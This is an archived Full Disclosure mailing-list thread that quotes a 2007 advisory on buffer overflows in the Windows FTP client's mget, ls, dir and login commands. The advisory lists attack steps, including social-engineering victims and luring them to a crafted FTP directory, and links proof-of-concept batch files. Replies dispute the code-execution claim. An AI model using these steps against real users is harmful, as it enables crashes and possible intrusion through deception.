Full Disclosure mailing list archives
Re: Microsoft FTP Client Multiple
From: "Daniel H. Renner" <dan () losangelescomputerhelp com>
Date: Wed, 28 Nov 2007 21:44:40 -0800
From what I've noticed, users of MS' FTP client aren't the usual Windows GUI user. So that would be one good social engineering trick... Original Message: ------------------------------------------------
Date: Wed, 28 Nov 2007 18:34:47 -0500 From: "Peter Dawson" <slash.pd () gmail com> Subject: Re: [Full-disclosure] Microsoft FTP Client Multiple Bufferoverflow Vulnerability To: "Stan Bubrouski" <stan.bubrouski () gmail com> Cc: full-disclosure () lists grok org uk Message-ID: <8f1f7b60711281534p554ccdb1mea0fd20826625658 () mail gmail com> Content-Type: text/plain; charset="utf-8" Yeah .. a) "Social engineer victim to open it." b) "Persuade victim to run the command " is kind funky.. On Nov 28, 2007 5:21 PM, Stan Bubrouski <stan.bubrouski () gmail com> wrote:Not to mention the obvious fact that if you have to trick someone into running a batch file then you could probably just tell the genius to execute a special EXE you crafted for them. -sb On Nov 28, 2007 4:43 PM, dev code <devcode29 () hotmail com> wrote:lolerowned, kinda like the 20 other non exploitable stack overflow exceptions that someone else has been reporting on full disclosure ________________________________ Date: Wed, 28 Nov 2007 09:11:30 -0600 From: reepex () gmail com To: rajesh.sethumadhavan () yahoo com;
full-disclosure () lists grok org uk
Subject: Re: [Full-disclosure] Microsoft FTP Client MultipleBufferoverflowVulnerability so... what fuzzer that you didnt code did you use to find these
amazing
vulns? Also nice 'payload' in your exploits meaning 'nice long lists
of "a"s'.
Youshould not claim code execution when your code does not perform it. Well I guess it has been good talking until your fuzzer crashes
another
application and you copy and paste the results On 11/28/07, Rajesh Sethumadhavan <rajesh.sethumadhavan () yahoo com>wrote:Microsoft FTP Client Multiple Bufferoverflow Vulnerability
#####################################################################
XDisclose Advisory : XD100096 Vulnerability Discovered: November 20th 2007 Advisory Reported : November 28th 2007 Credit : Rajesh Sethumadhavan Class : Buffer Overflow Denial Of Service Solution Status : Unpatched Vendor : Microsoft Corporation Affected applications : Microsoft FTP Client Affected Platform : Windows 2000 server Windows 2000 Professional Windows XP (Other Versions may be also effected)
#####################################################################
Overview: Bufferoverflow vulnerability is discovered in microsoft ftp client. Attackers can crash the ftp client of the victim user by tricking the user. Description: A remote attacker can craft packet with payload in the "mget", "ls", "dir", "username" and "password" commands as demonstrated below. When victim execute POC or specially crafted packets, ftp client will crash possible arbitrary code execution in contest of logged in user. This vulnerability is hard to exploit since it requires social engineering and shellcode has to be injected as argument in vulnerable commands. The vulnerability is caused due to an error in the Windows FTP client in validating commands like "mget", "dir", "user", password and "ls" Exploitation method: Method 1: -Send POC with payload to user. -Social engineer victim to open it. Method 2: -Attacker creates a directory with long folder or filename in his FTP server (should be other than IIS server) -Persuade victim to run the command "mget", "ls" or "dir" on specially crafted folder using microsoft ftp client -FTP client will crash and payload will get executed Proof Of Concept: http://www.xdisclose.com/poc/mget.bat.txt http://www.xdisclose.com/poc/username.bat.txt http://www.xdisclose.com/poc/directory.bat.txt http://www.xdisclose.com/poc/list.bat.txt Note: Modify POC to connect to lab FTP Server (As of now it will connect to ftp://xdisclose.com) Demonstration: Note: Demonstration leads to crashing of Microsoft FTP Client Download POC rename to .bat file and execute anyone of the batch file http://www.xdisclose.com/poc/mget.bat.txt http://www.xdisclose.com/poc/username.bat.txt http://www.xdisclose.com/poc/directory.bat.txt http://www.xdisclose.com/poc/list.bat.txt Solution: No Solution Screenshot: http://www.xdisclose.com/images/msftpbof.jpg Impact: Successful exploitation may allows execution of arbitrary code with privilege of currently logged in user. Impact of the vulnerability is system level. Original Advisory: http://www.xdisclose.com/advisory/XD100096.html Credits: Rajesh Sethumadhavan has been credited with the discovery of this vulnerability Disclaimer: This entire document is strictly for educational, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your own risk. The exploit code/Proof Of Concept is to be used on test environment only. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.
____________________________________________________________________________________
Never miss a thing. Make Yahoo your home page. http://www.yahoo.com/r/hs _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ________________________________ Connect and share in new ways with Windows Live. Connect now! _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-------------- next part -------------- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Microsoft FTP Client Multiple Daniel H. Renner (Nov 28)
- Re: Microsoft FTP Client Multiple Valdis . Kletnieks (Nov 29)
- Re: Microsoft FTP Client Multiple Dude VanWinkle (Nov 29)
- Re: Microsoft FTP Client Multiple Daniel H. Renner (Nov 29)
- Re: Microsoft FTP Client Multiple Peter Besenbruch (Nov 29)
- Re: Microsoft FTP Client Multiple Dude VanWinkle (Nov 29)
- Re: Microsoft FTP Client Multiple Valdis . Kletnieks (Nov 29)